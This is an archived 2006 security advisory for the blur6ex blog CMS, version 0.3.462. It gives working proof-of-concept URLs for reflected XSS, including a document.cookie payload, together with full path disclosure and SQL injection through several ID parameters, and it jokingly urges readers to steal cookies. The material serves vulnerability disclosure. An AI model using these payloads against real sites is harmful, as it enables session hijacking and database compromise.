TUCoPS :: HP Unsorted B :: b06-1539.htm

Blur6ex vulnerabilities
Multiple vulnerabilities in Blur6ex
Multiple vulnerabilities in Blur6ex




 k  k         kkkk  k   kkkk  k  k  kkkkkk kkkkkk    kkkk   k    k   k   k  k
 k k         k   k  k  k   k  k k     kk   k     k  k    k  kk   k   k   k k
 kk   <><>   kkkkk  k  kkkkk  kk      kk   kkkkkk   k    k  k k  k   k   kk
 k k         k      k  k      k k     kk   k   k    k    k  k  k k   k   k k
 k  k         kkkk  k   kkkk  k  k    kk   k    k    kkkk   k   kk   k   k  k

-+| Multiple Vulnerabilities in blur6ex

Author : Rusydi Hasan M
a.k.a  : cR45H3R
Date   : April,10th 2006
Place  : Indonesia, Cilacap

-+| Software description

blur6ex is a content management system for manage a blog.
Version : 0.3.462

-+| the bugs

1. I got XSS and full path disclosures in one step.
2. SQL injection

-+| Proof of Concept [PoC]

[0] XSS + Full path disclosures

http://[victim]/[blur6ex_dir]/index.php?shard=[XSS_here] 
http://[victim]/[blur6ex_dir]/index.php?shard=login&action=g_error&errormsg=[XSS_here] 

after you put XSS on the URL, the XSS will work and you also get the root
directory from the error message.

E[x]ample :

http://127.0.0.1/blur/index.php?shard=%3Ch1%3Ejust%20test%20your%20web%3C/h1%3E 

Warning: main(): Failed opening 'engine/shards/

just test your web

.php' for inclusion (include_path='.:/usr/lib/php/:/usr/share/pear/') in /var/www/html/blur/index.php on line 108 "just test your web" will show as

http://127.0.0.1/blur/index.php?shard=login&action=g_error&errormsg=%3Cscript%3Ealert(document. cookie)%3C/script%3E http://127.0.0.1/blur/index.php?shard=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://127.0.0.1/blur/index.php?shard=%3Cmarquee%3E --> seems good.try it :) Now, go and steal the cookie but don't eat it :P. [1] SQL injection http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_reply&ID=[SQL_here] http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_permaPost&ID=[SQL_here] http://[victim]/[blur6ex_dir]/index.php?shard=content&action=g_viewContent&ID=[SQL_here] You can see the database structure in http://[victim]/[blur6ex_dir]/install/blur6ex_tables.sql *if you were lucky :)* E[x]ample : http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID='or%201=1/* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'or 1=1/*' at line 1 http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201=0 http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201=1 -+| Vendor I'm Still lazy [LOLZ] -+| Shoutz % fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc % y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the day % ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben -+| Contact crasher@kecoak.or.id || http://kecoak.or.id

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH